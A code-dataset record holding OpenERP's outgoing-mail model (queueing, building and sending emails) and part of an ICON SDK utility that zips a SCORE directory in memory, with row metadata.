hexsha stringlengths 40 40 | size int64 7 1.04M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 4 247 | max_stars_repo_name stringlengths 4 125 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 368k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 247 | max_issues_repo_name stringlengths 4 125 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 247 | max_forks_repo_name stringlengths 4 125 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.04M | avg_line_length float64 1.77 618k | max_line_length int64 1 1.02M | alphanum_fraction float64 0 1 | original_content stringlengths 7 1.04M | filtered:remove_function_no_docstring int64 -102 942k | filtered:remove_class_no_docstring int64 -354 977k | filtered:remove_delete_markers int64 0 60.1k |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
b558f4729be0aa98c2ad900457f20593df16d0f5 | 17,012 | py | Python | openerp/addons/mail/mail_mail.py | ntiufalara/openerp7 | 903800da0644ec0dd9c1dcd34205541f84d45fe4 | [
"MIT"
] | 3 | 2016-01-29T14:39:49.000Z | 2018-12-29T22:42:00.000Z | openerp/addons/mail/mail_mail.py | ntiufalara/openerp7 | 903800da0644ec0dd9c1dcd34205541f84d45fe4 | [
"MIT"
] | 2 | 2016-03-23T14:29:41.000Z | 2017-02-20T17:11:30.000Z | openerp/addons/mail/mail_mail.py | ntiufalara/openerp7 | 903800da0644ec0dd9c1dcd34205541f84d45fe4 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2010-today OpenERP SA (<http://www.openerp.com>)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>
#
##############################################################################
import base64
import logging
import re
from urllib import urlencode
from urlparse import urljoin
from openerp import tools
from openerp import SUPERUSER_ID
from openerp.osv import fields, osv
from openerp.osv.orm import except_orm
from openerp.tools.translate import _
_logger = logging.getLogger(__name__)
class mail_mail(osv.Model):
    """ Model holding RFC2822 email messages to send. This model also provides
        facilities to queue and send new email messages. """
    _name = 'mail.mail'
    _description = 'Outgoing Mails'
    _inherits = {'mail.message': 'mail_message_id'}
    _order = 'id desc'

    _columns = {
        'mail_message_id': fields.many2one('mail.message', 'Message', required=True, ondelete='cascade'),
        'mail_server_id': fields.many2one('ir.mail_server', 'Outgoing mail server', readonly=1),
        'state': fields.selection([
            ('outgoing', 'Outgoing'),
            ('sent', 'Sent'),
            ('received', 'Received'),
            ('exception', 'Delivery Failed'),
            ('cancel', 'Cancelled'),
        ], 'Status', readonly=True),
        'auto_delete': fields.boolean('Auto Delete',
            help="Permanently delete this email after sending it, to save space"),
        'references': fields.text('References', help='Message references, such as identifiers of previous messages', readonly=1),
        'email_from': fields.char('From', help='Message sender, taken from user preferences.'),
        'email_to': fields.text('To', help='Message recipients'),
        'email_cc': fields.char('Cc', help='Carbon copy message recipients'),
        'reply_to': fields.char('Reply-To', help='Preferred response address for the message'),
        'body_html': fields.text('Rich-text Contents', help="Rich-text/HTML message"),
        # Auto-detected based on create() - if 'mail_message_id' was passed then this mail is a notification
        # and during unlink() we will not cascade delete the parent and its attachments
        'notification': fields.boolean('Is Notification')
    }

    def _get_default_from(self, cr, uid, context=None):
        """ Return the default sender address for outgoing mails: the current
            user's alias address when an alias domain is configured, otherwise
            the user's own email address.

            This method is required by the ``email_from`` entry of
            ``_defaults`` below.

            :raise osv.except_osv: if the user has neither an alias nor an
                email address configured
        """
        this = self.pool.get('res.users').browse(cr, uid, uid, context=context)
        if this.alias_domain:
            return '%s@%s' % (this.alias_name, this.alias_domain)
        elif this.email:
            return this.email
        raise osv.except_osv(_('Invalid Action!'), _("Unable to send email, please configure the sender's email address or alias."))

    _defaults = {
        'state': 'outgoing',
        # bound through a lambda so that subclass overrides of
        # _get_default_from are honored at default-computation time
        'email_from': lambda self, cr, uid, ctx=None: self._get_default_from(cr, uid, ctx),
    }

    def default_get(self, cr, uid, fields, context=None):
        """ Override to drop a 'default_type' value leaking from another
            model's menu action context (e.g. invoices), which would not be a
            valid selection value for mail.message's 'type' column. """
        # protection for `default_type` values leaking from menu action context (e.g. for invoices)
        # To remove when automatic context propagation is removed in web client
        if context and context.get('default_type') and context.get('default_type') not in self._all_columns['type'].column.selection:
            context = dict(context, default_type=None)
        return super(mail_mail, self).default_get(cr, uid, fields, context=context)

    def create(self, cr, uid, values, context=None):
        """ Override to flag mails created for an already-existing
            mail.message as notifications (see 'notification' column). """
        if 'notification' not in values and values.get('mail_message_id'):
            values['notification'] = True
        return super(mail_mail, self).create(cr, uid, values, context=context)

    def unlink(self, cr, uid, ids, context=None):
        """ Override to cascade-delete the parent mail.message (and therefore
            its attachments) of mails that were NOT created as notifications
            of an existing message. """
        # cascade-delete the parent message for all mails that are not created for a notification
        ids_to_cascade = self.search(cr, uid, [('notification', '=', False), ('id', 'in', ids)])
        parent_msg_ids = [m.mail_message_id.id for m in self.browse(cr, uid, ids_to_cascade, context=context)]
        res = super(mail_mail, self).unlink(cr, uid, ids, context=context)
        self.pool.get('mail.message').unlink(cr, uid, parent_msg_ids, context=context)
        return res

    def mark_outgoing(self, cr, uid, ids, context=None):
        """ Put the given mails back into the outgoing queue. """
        return self.write(cr, uid, ids, {'state': 'outgoing'}, context=context)

    def cancel(self, cr, uid, ids, context=None):
        """ Cancel the sending of the given mails. """
        return self.write(cr, uid, ids, {'state': 'cancel'}, context=context)

    def process_email_queue(self, cr, uid, ids=None, context=None):
        """Send immediately queued messages, committing after each
           message is sent - this is not transactional and should
           not be called during another transaction!

           :param list ids: optional list of emails ids to send. If passed
                            no search is performed, and these ids are used
                            instead.
           :param dict context: if a 'filters' key is present in context,
                                this value will be used as an additional
                                filter to further restrict the outgoing
                                messages to send (by default all 'outgoing'
                                messages are sent).
           :return: result of :meth:`send`, or None if sending failed
        """
        if context is None:
            context = {}
        if not ids:
            filters = ['&', ('state', '=', 'outgoing'), ('type', '=', 'email')]
            if 'filters' in context:
                filters.extend(context['filters'])
            ids = self.search(cr, uid, filters, context=context)
        res = None
        try:
            # Force auto-commit - this is meant to be called by
            # the scheduler, and we can't allow rolling back the status
            # of previously sent emails!
            res = self.send(cr, uid, ids, auto_commit=True, context=context)
        except Exception:
            _logger.exception("Failed processing mail queue")
        return res

    def _postprocess_sent_message(self, cr, uid, mail, context=None):
        """Perform any post-processing necessary after sending ``mail``
        successfully, including deleting it completely along with its
        attachment if the ``auto_delete`` flag of the mail was set.
        Overridden by subclasses for extra post-processing behaviors.

        :param browse_record mail: the mail that was just sent
        :return: True
        """
        if mail.auto_delete:
            # done with SUPERUSER_ID to avoid giving large unlink access rights
            self.unlink(cr, SUPERUSER_ID, [mail.id], context=context)
        return True

    def send_get_mail_subject(self, cr, uid, mail, force=False, partner=None, context=None):
        """ If subject is void and record_name defined: '<Author> posted on <Resource>'

        :param boolean force: force the subject replacement
        :param browse_record mail: mail.mail browse_record
        :param browse_record partner: specific recipient partner
        """
        if (force or not mail.subject) and mail.record_name:
            return 'Re: %s' % (mail.record_name)
        elif (force or not mail.subject) and mail.parent_id and mail.parent_id.subject:
            return 'Re: %s' % (mail.parent_id.subject)
        return mail.subject

    def send_get_mail_body(self, cr, uid, mail, partner=None, context=None):
        """ Return a specific ir_email body. The main purpose of this method
        is to be inherited by Portal, to add a link for signing in, in
        each notification email a partner receives.

        :param browse_record mail: mail.mail browse_record
        :param browse_record partner: specific recipient partner
        """
        body = mail.body_html
        # partner is a user, link to a related document (incentive to install portal)
        if partner and partner.user_ids and mail.model and mail.res_id \
                and self.check_access_rights(cr, partner.user_ids[0].id, 'read', raise_exception=False):
            related_user = partner.user_ids[0]
            try:
                self.pool.get(mail.model).check_access_rule(cr, related_user.id, [mail.res_id], 'read', context=context)
                base_url = self.pool.get('ir.config_parameter').get_param(cr, uid, 'web.base.url')
                # the parameters to encode for the query and fragment part of url
                query = {'db': cr.dbname}
                fragment = {
                    'login': related_user.login,
                    'model': mail.model,
                    'id': mail.res_id,
                }
                url = urljoin(base_url, "?%s#%s" % (urlencode(query), urlencode(fragment)))
                # NOTE(review): `text` already contains <p> tags, and the wrapper
                # below adds another <p> around it -- harmless in mail clients but
                # produces nested paragraphs; confirm before changing the markup.
                text = _("""<p>Access this document <a href="%s">directly in OpenERP</a></p>""") % url
                body = tools.append_content_to_html(body, ("<div><p>%s</p></div>" % text), plaintext=False)
            except except_orm:
                # recipient has no read access to the document: silently skip the link
                pass
        return body

    def send_get_mail_reply_to(self, cr, uid, mail, partner=None, context=None):
        """ Return a specific ir_email reply_to.

        :param browse_record mail: mail.mail browse_record
        :param browse_record partner: specific recipient partner
        """
        if mail.reply_to:
            return mail.reply_to
        email_reply_to = False
        # if model and res_id: try to use ``message_get_reply_to`` that returns the document alias
        if mail.model and mail.res_id and hasattr(self.pool.get(mail.model), 'message_get_reply_to'):
            email_reply_to = self.pool.get(mail.model).message_get_reply_to(cr, uid, [mail.res_id], context=context)[0]
        # no alias reply_to -> reply_to will be the email_from, only the email part
        if not email_reply_to and mail.email_from:
            emails = tools.email_split(mail.email_from)
            if emails:
                email_reply_to = emails[0]
        # format 'Document name <email_address>'
        if email_reply_to and mail.model and mail.res_id:
            document_name = self.pool.get(mail.model).name_get(cr, SUPERUSER_ID, [mail.res_id], context=context)[0]
            if document_name:
                # sanitize document name
                sanitized_doc_name = re.sub(r'[^\w+.]+', '-', document_name[1])
                # generate reply to
                email_reply_to = _('"Followers of %s" <%s>') % (sanitized_doc_name, email_reply_to)
        return email_reply_to

    def send_get_email_dict(self, cr, uid, mail, partner=None, context=None):
        """ Return a dictionary for specific email values, depending on a
        partner, or generic to the whole recipients given by mail.email_to.

        :param browse_record mail: mail.mail browse_record
        :param browse_record partner: specific recipient partner
        """
        body = self.send_get_mail_body(cr, uid, mail, partner=partner, context=context)
        subject = self.send_get_mail_subject(cr, uid, mail, partner=partner, context=context)
        reply_to = self.send_get_mail_reply_to(cr, uid, mail, partner=partner, context=context)
        body_alternative = tools.html2plaintext(body)
        # generate email_to, heuristic:
        # 1. if 'partner' is specified and there is a related document: Followers of 'Doc' <email>
        # 2. if 'partner' is specified, but no related document: Partner Name <email>
        # 3; fallback on mail.email_to that we split to have an email addresses list
        if partner and mail.record_name:
            sanitized_record_name = re.sub(r'[^\w+.]+', '-', mail.record_name)
            email_to = [_('"Followers of %s" <%s>') % (sanitized_record_name, partner.email)]
        elif partner:
            email_to = ['%s <%s>' % (partner.name, partner.email)]
        else:
            email_to = tools.email_split(mail.email_to)
        return {
            'body': body,
            'body_alternative': body_alternative,
            'subject': subject,
            'email_to': email_to,
            'reply_to': reply_to,
        }

    def send(self, cr, uid, ids, auto_commit=False, recipient_ids=None, context=None):
        """ Sends the selected emails immediately, ignoring their current
            state (mails that have already been sent should not be passed
            unless they should actually be re-sent).
            Emails successfully delivered are marked as 'sent', and those
            that fail to be deliver are marked as 'exception', and the
            corresponding error mail is output in the server logs.

            :param bool auto_commit: whether to force a commit of the mail status
                after sending each mail (meant only for scheduler processing);
                should never be True during normal transactions (default: False)
            :param list recipient_ids: specific list of res.partner recipients.
                If set, one email is sent to each partner. Its is possible to
                tune the sent email through ``send_get_mail_body`` and ``send_get_mail_subject``.
                If not specified, one email is sent to mail_mail.email_to.
            :return: True
        """
        ir_mail_server = self.pool.get('ir.mail_server')
        for mail in self.browse(cr, uid, ids, context=context):
            try:
                # handle attachments
                attachments = []
                for attach in mail.attachment_ids:
                    attachments.append((attach.datas_fname, base64.b64decode(attach.datas)))
                # specific behavior to customize the send email for notified partners
                email_list = []
                if recipient_ids:
                    partner_obj = self.pool.get('res.partner')
                    # filter out partners deleted since the notification was created
                    existing_recipient_ids = partner_obj.exists(cr, SUPERUSER_ID, recipient_ids, context=context)
                    for partner in partner_obj.browse(cr, SUPERUSER_ID, existing_recipient_ids, context=context):
                        email_list.append(self.send_get_email_dict(cr, uid, mail, partner=partner, context=context))
                else:
                    email_list.append(self.send_get_email_dict(cr, uid, mail, context=context))
                # build an RFC2822 email.message.Message object and send it without queuing
                res = None
                for email in email_list:
                    msg = ir_mail_server.build_email(
                        email_from = mail.email_from,
                        email_to = email.get('email_to'),
                        subject = email.get('subject'),
                        body = email.get('body'),
                        body_alternative = email.get('body_alternative'),
                        email_cc = tools.email_split(mail.email_cc),
                        reply_to = email.get('reply_to'),
                        attachments = attachments,
                        message_id = mail.message_id,
                        references = mail.references,
                        object_id = mail.res_id and ('%s-%s' % (mail.res_id, mail.model)),
                        subtype = 'html',
                        subtype_alternative = 'plain')
                    res = ir_mail_server.send_email(cr, uid, msg,
                                                    mail_server_id=mail.mail_server_id.id, context=context)
                if res:
                    mail.write({'state': 'sent', 'message_id': res})
                    mail_sent = True
                else:
                    mail.write({'state': 'exception'})
                    mail_sent = False
                # /!\ can't use mail.state here, as mail.refresh() will cause an error
                # see revid:odo@openerp.com-20120622152536-42b2s28lvdv3odyr in 6.1
                if mail_sent:
                    self._postprocess_sent_message(cr, uid, mail, context=context)
            except MemoryError:
                # prevent catching transient MemoryErrors, bubble up to notify user or abort cron job
                # instead of marking the mail as failed
                raise
            except Exception:
                _logger.exception('failed sending mail.mail %s', mail.id)
                mail.write({'state': 'exception'})
            if auto_commit:
                cr.commit()
        return True
| 51.087087 | 133 | 0.6081 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2010-today OpenERP SA (<http://www.openerp.com>)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>
#
##############################################################################
import base64
import logging
import re
from urllib import urlencode
from urlparse import urljoin
from openerp import tools
from openerp import SUPERUSER_ID
from openerp.osv import fields, osv
from openerp.osv.orm import except_orm
from openerp.tools.translate import _
_logger = logging.getLogger(__name__)
class mail_mail(osv.Model):
    """ Model holding RFC2822 email messages to send. This model also provides
        facilities to queue and send new email messages. """
    _name = 'mail.mail'
    _description = 'Outgoing Mails'
    _inherits = {'mail.message': 'mail_message_id'}
    _order = 'id desc'
    _columns = {
        'mail_message_id': fields.many2one('mail.message', 'Message', required=True, ondelete='cascade'),
        'mail_server_id': fields.many2one('ir.mail_server', 'Outgoing mail server', readonly=1),
        'state': fields.selection([
            ('outgoing', 'Outgoing'),
            ('sent', 'Sent'),
            ('received', 'Received'),
            ('exception', 'Delivery Failed'),
            ('cancel', 'Cancelled'),
        ], 'Status', readonly=True),
        'auto_delete': fields.boolean('Auto Delete',
            help="Permanently delete this email after sending it, to save space"),
        'references': fields.text('References', help='Message references, such as identifiers of previous messages', readonly=1),
        'email_from': fields.char('From', help='Message sender, taken from user preferences.'),
        'email_to': fields.text('To', help='Message recipients'),
        'email_cc': fields.char('Cc', help='Carbon copy message recipients'),
        'reply_to': fields.char('Reply-To', help='Preferred response address for the message'),
        'body_html': fields.text('Rich-text Contents', help="Rich-text/HTML message"),
        # Auto-detected based on create() - if 'mail_message_id' was passed then this mail is a notification
        # and during unlink() we will not cascade delete the parent and its attachments
        'notification': fields.boolean('Is Notification')
    }
    def _get_default_from(self, cr, uid, context=None):
        """ Return the default sender address: the current user's alias
            address if an alias domain is configured, else the user's email.

            :raise osv.except_osv: if neither alias nor email is configured
        """
        this = self.pool.get('res.users').browse(cr, uid, uid, context=context)
        if this.alias_domain:
            return '%s@%s' % (this.alias_name, this.alias_domain)
        elif this.email:
            return this.email
        raise osv.except_osv(_('Invalid Action!'), _("Unable to send email, please configure the sender's email address or alias."))
    _defaults = {
        'state': 'outgoing',
        # lambda indirection so subclass overrides of _get_default_from are honored
        'email_from': lambda self, cr, uid, ctx=None: self._get_default_from(cr, uid, ctx),
    }
    def default_get(self, cr, uid, fields, context=None):
        """ Override to drop a 'default_type' value that is not a valid
            selection value for the inherited 'type' column. """
        # protection for `default_type` values leaking from menu action context (e.g. for invoices)
        # To remove when automatic context propagation is removed in web client
        if context and context.get('default_type') and context.get('default_type') not in self._all_columns['type'].column.selection:
            context = dict(context, default_type=None)
        return super(mail_mail, self).default_get(cr, uid, fields, context=context)
    def create(self, cr, uid, values, context=None):
        """ Override to flag mails created for an existing mail.message as
            notifications (see the 'notification' column comment). """
        if 'notification' not in values and values.get('mail_message_id'):
            values['notification'] = True
        return super(mail_mail, self).create(cr, uid, values, context=context)
    def unlink(self, cr, uid, ids, context=None):
        """ Override to cascade-delete the parent mail.message of mails that
            were not created as notifications. """
        # cascade-delete the parent message for all mails that are not created for a notification
        ids_to_cascade = self.search(cr, uid, [('notification', '=', False), ('id', 'in', ids)])
        parent_msg_ids = [m.mail_message_id.id for m in self.browse(cr, uid, ids_to_cascade, context=context)]
        res = super(mail_mail, self).unlink(cr, uid, ids, context=context)
        self.pool.get('mail.message').unlink(cr, uid, parent_msg_ids, context=context)
        return res
    def mark_outgoing(self, cr, uid, ids, context=None):
        """ Put the given mails back into the outgoing queue. """
        return self.write(cr, uid, ids, {'state': 'outgoing'}, context=context)
    def cancel(self, cr, uid, ids, context=None):
        """ Cancel the sending of the given mails. """
        return self.write(cr, uid, ids, {'state': 'cancel'}, context=context)
    def process_email_queue(self, cr, uid, ids=None, context=None):
        """Send immediately queued messages, committing after each
           message is sent - this is not transactional and should
           not be called during another transaction!

           :param list ids: optional list of emails ids to send. If passed
                            no search is performed, and these ids are used
                            instead.
           :param dict context: if a 'filters' key is present in context,
                                this value will be used as an additional
                                filter to further restrict the outgoing
                                messages to send (by default all 'outgoing'
                                messages are sent).
        """
        if context is None:
            context = {}
        if not ids:
            filters = ['&', ('state', '=', 'outgoing'), ('type', '=', 'email')]
            if 'filters' in context:
                filters.extend(context['filters'])
            ids = self.search(cr, uid, filters, context=context)
        res = None
        try:
            # Force auto-commit - this is meant to be called by
            # the scheduler, and we can't allow rolling back the status
            # of previously sent emails!
            res = self.send(cr, uid, ids, auto_commit=True, context=context)
        except Exception:
            _logger.exception("Failed processing mail queue")
        return res
    def _postprocess_sent_message(self, cr, uid, mail, context=None):
        """Perform any post-processing necessary after sending ``mail``
        successfully, including deleting it completely along with its
        attachment if the ``auto_delete`` flag of the mail was set.
        Overridden by subclasses for extra post-processing behaviors.

        :param browse_record mail: the mail that was just sent
        :return: True
        """
        if mail.auto_delete:
            # done with SUPERUSER_ID to avoid giving large unlink access rights
            self.unlink(cr, SUPERUSER_ID, [mail.id], context=context)
        return True
    def send_get_mail_subject(self, cr, uid, mail, force=False, partner=None, context=None):
        """ If subject is void and record_name defined: '<Author> posted on <Resource>'

        :param boolean force: force the subject replacement
        :param browse_record mail: mail.mail browse_record
        :param browse_record partner: specific recipient partner
        """
        if (force or not mail.subject) and mail.record_name:
            return 'Re: %s' % (mail.record_name)
        elif (force or not mail.subject) and mail.parent_id and mail.parent_id.subject:
            return 'Re: %s' % (mail.parent_id.subject)
        return mail.subject
    def send_get_mail_body(self, cr, uid, mail, partner=None, context=None):
        """ Return a specific ir_email body. The main purpose of this method
        is to be inherited by Portal, to add a link for signing in, in
        each notification email a partner receives.

        :param browse_record mail: mail.mail browse_record
        :param browse_record partner: specific recipient partner
        """
        body = mail.body_html
        # partner is a user, link to a related document (incentive to install portal)
        if partner and partner.user_ids and mail.model and mail.res_id \
                and self.check_access_rights(cr, partner.user_ids[0].id, 'read', raise_exception=False):
            related_user = partner.user_ids[0]
            try:
                self.pool.get(mail.model).check_access_rule(cr, related_user.id, [mail.res_id], 'read', context=context)
                base_url = self.pool.get('ir.config_parameter').get_param(cr, uid, 'web.base.url')
                # the parameters to encode for the query and fragment part of url
                query = {'db': cr.dbname}
                fragment = {
                    'login': related_user.login,
                    'model': mail.model,
                    'id': mail.res_id,
                }
                url = urljoin(base_url, "?%s#%s" % (urlencode(query), urlencode(fragment)))
                text = _("""<p>Access this document <a href="%s">directly in OpenERP</a></p>""") % url
                body = tools.append_content_to_html(body, ("<div><p>%s</p></div>" % text), plaintext=False)
            # recipient has no read access to the document: silently skip the link
            except except_orm, e:
                pass
        return body
    def send_get_mail_reply_to(self, cr, uid, mail, partner=None, context=None):
        """ Return a specific ir_email reply_to.

        :param browse_record mail: mail.mail browse_record
        :param browse_record partner: specific recipient partner
        """
        if mail.reply_to:
            return mail.reply_to
        email_reply_to = False
        # if model and res_id: try to use ``message_get_reply_to`` that returns the document alias
        if mail.model and mail.res_id and hasattr(self.pool.get(mail.model), 'message_get_reply_to'):
            email_reply_to = self.pool.get(mail.model).message_get_reply_to(cr, uid, [mail.res_id], context=context)[0]
        # no alias reply_to -> reply_to will be the email_from, only the email part
        if not email_reply_to and mail.email_from:
            emails = tools.email_split(mail.email_from)
            if emails:
                email_reply_to = emails[0]
        # format 'Document name <email_address>'
        if email_reply_to and mail.model and mail.res_id:
            document_name = self.pool.get(mail.model).name_get(cr, SUPERUSER_ID, [mail.res_id], context=context)[0]
            if document_name:
                # sanitize document name
                sanitized_doc_name = re.sub(r'[^\w+.]+', '-', document_name[1])
                # generate reply to
                email_reply_to = _('"Followers of %s" <%s>') % (sanitized_doc_name, email_reply_to)
        return email_reply_to
    def send_get_email_dict(self, cr, uid, mail, partner=None, context=None):
        """ Return a dictionary for specific email values, depending on a
        partner, or generic to the whole recipients given by mail.email_to.

        :param browse_record mail: mail.mail browse_record
        :param browse_record partner: specific recipient partner
        """
        body = self.send_get_mail_body(cr, uid, mail, partner=partner, context=context)
        subject = self.send_get_mail_subject(cr, uid, mail, partner=partner, context=context)
        reply_to = self.send_get_mail_reply_to(cr, uid, mail, partner=partner, context=context)
        body_alternative = tools.html2plaintext(body)
        # generate email_to, heuristic:
        # 1. if 'partner' is specified and there is a related document: Followers of 'Doc' <email>
        # 2. if 'partner' is specified, but no related document: Partner Name <email>
        # 3; fallback on mail.email_to that we split to have an email addresses list
        if partner and mail.record_name:
            sanitized_record_name = re.sub(r'[^\w+.]+', '-', mail.record_name)
            email_to = [_('"Followers of %s" <%s>') % (sanitized_record_name, partner.email)]
        elif partner:
            email_to = ['%s <%s>' % (partner.name, partner.email)]
        else:
            email_to = tools.email_split(mail.email_to)
        return {
            'body': body,
            'body_alternative': body_alternative,
            'subject': subject,
            'email_to': email_to,
            'reply_to': reply_to,
        }
    def send(self, cr, uid, ids, auto_commit=False, recipient_ids=None, context=None):
        """ Sends the selected emails immediately, ignoring their current
            state (mails that have already been sent should not be passed
            unless they should actually be re-sent).
            Emails successfully delivered are marked as 'sent', and those
            that fail to be deliver are marked as 'exception', and the
            corresponding error mail is output in the server logs.

            :param bool auto_commit: whether to force a commit of the mail status
                after sending each mail (meant only for scheduler processing);
                should never be True during normal transactions (default: False)
            :param list recipient_ids: specific list of res.partner recipients.
                If set, one email is sent to each partner. Its is possible to
                tune the sent email through ``send_get_mail_body`` and ``send_get_mail_subject``.
                If not specified, one email is sent to mail_mail.email_to.
            :return: True
        """
        ir_mail_server = self.pool.get('ir.mail_server')
        for mail in self.browse(cr, uid, ids, context=context):
            try:
                # handle attachments
                attachments = []
                for attach in mail.attachment_ids:
                    attachments.append((attach.datas_fname, base64.b64decode(attach.datas)))
                # specific behavior to customize the send email for notified partners
                email_list = []
                if recipient_ids:
                    partner_obj = self.pool.get('res.partner')
                    # filter out partners deleted since the notification was created
                    existing_recipient_ids = partner_obj.exists(cr, SUPERUSER_ID, recipient_ids, context=context)
                    for partner in partner_obj.browse(cr, SUPERUSER_ID, existing_recipient_ids, context=context):
                        email_list.append(self.send_get_email_dict(cr, uid, mail, partner=partner, context=context))
                else:
                    email_list.append(self.send_get_email_dict(cr, uid, mail, context=context))
                # build an RFC2822 email.message.Message object and send it without queuing
                res = None
                for email in email_list:
                    msg = ir_mail_server.build_email(
                        email_from = mail.email_from,
                        email_to = email.get('email_to'),
                        subject = email.get('subject'),
                        body = email.get('body'),
                        body_alternative = email.get('body_alternative'),
                        email_cc = tools.email_split(mail.email_cc),
                        reply_to = email.get('reply_to'),
                        attachments = attachments,
                        message_id = mail.message_id,
                        references = mail.references,
                        object_id = mail.res_id and ('%s-%s' % (mail.res_id, mail.model)),
                        subtype = 'html',
                        subtype_alternative = 'plain')
                    res = ir_mail_server.send_email(cr, uid, msg,
                                                    mail_server_id=mail.mail_server_id.id, context=context)
                if res:
                    mail.write({'state': 'sent', 'message_id': res})
                    mail_sent = True
                else:
                    mail.write({'state': 'exception'})
                    mail_sent = False
                # /!\ can't use mail.state here, as mail.refresh() will cause an error
                # see revid:odo@openerp.com-20120622152536-42b2s28lvdv3odyr in 6.1
                if mail_sent:
                    self._postprocess_sent_message(cr, uid, mail, context=context)
            except MemoryError:
                # prevent catching transient MemoryErrors, bubble up to notify user or abort cron job
                # instead of marking the mail as failed
                raise
            except Exception:
                _logger.exception('failed sending mail.mail %s', mail.id)
                mail.write({'state': 'exception'})
            if auto_commit == True:
                cr.commit()
        return True
| 1,826 | 0 | 162 |
27acaab673252d4b7266cdbbc2d11f4abab7293b | 3,043 | py | Python | iconsdk/libs/in_memory_zip.py | geometry-labs/icon-sdk-python | e530df02eb16b394c3022d2d7d0383bd972e129a | [
"Apache-2.0"
] | 51 | 2018-08-29T04:15:36.000Z | 2022-03-14T10:02:08.000Z | iconsdk/libs/in_memory_zip.py | geometry-labs/icon-sdk-python | e530df02eb16b394c3022d2d7d0383bd972e129a | [
"Apache-2.0"
] | 24 | 2018-09-03T03:16:19.000Z | 2022-01-17T08:28:04.000Z | iconsdk/libs/in_memory_zip.py | geometry-labs/icon-sdk-python | e530df02eb16b394c3022d2d7d0383bd972e129a | [
"Apache-2.0"
] | 44 | 2018-09-06T22:36:16.000Z | 2022-03-15T06:46:05.000Z | # -*- coding: utf-8 -*-
# Copyright 2018 ICON Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from io import BytesIO
from os import path, walk
from zipfile import ZipFile, ZIP_DEFLATED
from iconsdk.exception import ZipException
def gen_deploy_data_content(_path: str) -> bytes:
    """Generate bytes of zip data of SCORE.

    :param _path: Path of the directory (or existing zip file) to be zipped.
    :return: the in-memory zip archive as bytes
    :raise ValueError: if ``_path`` is neither a file nor a directory
    :raise ZipException: if the SCORE contents cannot be zipped
    """
    if path.isdir(_path) is False and path.isfile(_path) is False:
        raise ValueError(f"Invalid path {_path}")
    try:
        memory_zip = InMemoryZip()
        memory_zip.zip_in_memory(_path)
    except ZipException as e:
        # chain the original error so the root cause is not discarded;
        # the message was previously a placeholder-less f-string (lint F541)
        raise ZipException("Can't zip SCORE contents") from e
    else:
        return memory_zip.data
class InMemoryZip:
    """Class for compressing data in memory using zip and BytesIO."""

    def __init__(self):
        """Create the empty in-memory buffer that backs the zip archive.

        (This initializer was missing, so ``self._in_memory`` was never
        created and every method raised AttributeError.)
        """
        self._in_memory = BytesIO()

    @property
    def data(self) -> bytes:
        """Returns zip data

        :return: zip data
        """
        self._in_memory.seek(0)
        return self._in_memory.read()

    def zip_in_memory(self, _path: str):
        """Compress zip data (bytes) in memory.

        :param _path: The path of the directory (or existing zip file) to be zipped.
        """
        try:
            # when it is a zip file: validate it, then copy it into the buffer verbatim
            if path.isfile(_path):
                # use a context manager so the validation handle is closed (was leaked)
                with ZipFile(_path, 'r', ZIP_DEFLATED, False) as zf:
                    zf.testzip()
                with open(_path, mode='rb') as fp:
                    fp.seek(0)
                    self._in_memory.seek(0)
                    self._in_memory.write(fp.read())
            else:
                # root path for figuring out directory of tests
                tmp_root = None
                with ZipFile(self._in_memory, 'a', ZIP_DEFLATED, False, compresslevel=9) as zf:
                    for root, folders, files in walk(_path):
                        if 'package.json' in files:
                            tmp_root = root
                        # skip the package's tests directory, caches and hidden entries
                        if tmp_root and root.replace(tmp_root, '') == '/tests':
                            continue
                        if root.find('__pycache__') != -1:
                            continue
                        if root.find('/.') != -1:
                            continue
                        for file in files:
                            if file.startswith('.'):
                                continue
                            full_path = path.join(root, file)
                            zf.write(full_path)
        except ZipException:
            # NOTE(review): only ZipException is translated here; zipfile.BadZipFile
            # and OSError propagate unchanged -- confirm that is the intended contract.
            raise ZipException
| 34.191011 | 95 | 0.562603 | # -*- coding: utf-8 -*-
